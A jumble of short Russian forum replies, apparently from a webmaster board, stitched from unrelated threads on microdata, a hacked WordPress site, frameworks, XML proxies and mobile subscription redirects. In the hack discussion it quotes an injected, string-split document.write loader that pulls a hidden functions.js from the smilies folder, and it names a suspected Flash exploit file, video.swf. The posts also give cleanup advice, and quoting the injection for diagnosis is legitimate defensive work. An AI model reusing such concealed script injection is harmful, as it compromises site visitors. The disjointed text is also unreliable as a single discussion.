Микроразметка.
Посмотрите как у них сделана и крутите.
Это - поведенческий анализ, если вы понимаете суть.
На конфе именно такие примеры показывали, весьма сложно программно найти, поэтому анализ идет на ПФ.
Тут нечего искать - сразу видны "странные" вставки.
video.swf - вскроете и станет ясно что это.
Сейчас:
Смотрите бекапы, если этого раньше не было - удаляйте все.
Потом ищете как злоумышленник смог получить доступ и закрывайте дыры на сайте.
Не понял.
Какая наивность ))
А "хакеры", наверно, пароли только угадывают?
Покажи сайт, покажите запросы - и сразу получите предметные ответы.
http://pravogroup.ru/wp-includes/images/crystal/video.swf
http://pravogroup.ru/wp-includes/images/smilies/functions.js
document.write("<scr"+"ipt src='/wp-includes/images/smilies/functions.js'><"+"/script>");
<script type='text/javascript' src='http://pravogroup.ru/wp-content/themes/twentytwelve/js/navigation.js?ver=1.0'></script>
Обратный порядок для обнаружения.
Саму флешку было лень ковырять, возможно она не при чем, но скорее всего:
1. Зачем шифровать, если она нормальная
2. Эксплуатирует уязвимость в какой-то версии Флеш-плеера.
Если решитесь - делайте на фреймворке, чтобы поддерживать/модифицировать другим было просто, только не Zend&co
а что-то легкое Yii 1 , к примеру.
По мимо прокси XML можно, я у себя через него собираю.
sitemap тут вообще при чем?
Вы бы хоть что-нибудь для начала почитали бы, чтобы хоть как-то минимум знаний иметь.
Почитайте про быстрые ссылки, к примеру.
Есть разные реализации всего этого.
Ну так отзывы посмотревших - будут?
Не на мегафон, а на подписки он редиректит.
Весьма интересный случай, будем ковырять
CreatoRDC, можно более предметно?
Какая страница была открыта, откуда был переход, какое именно устройство, браузер, какой город.
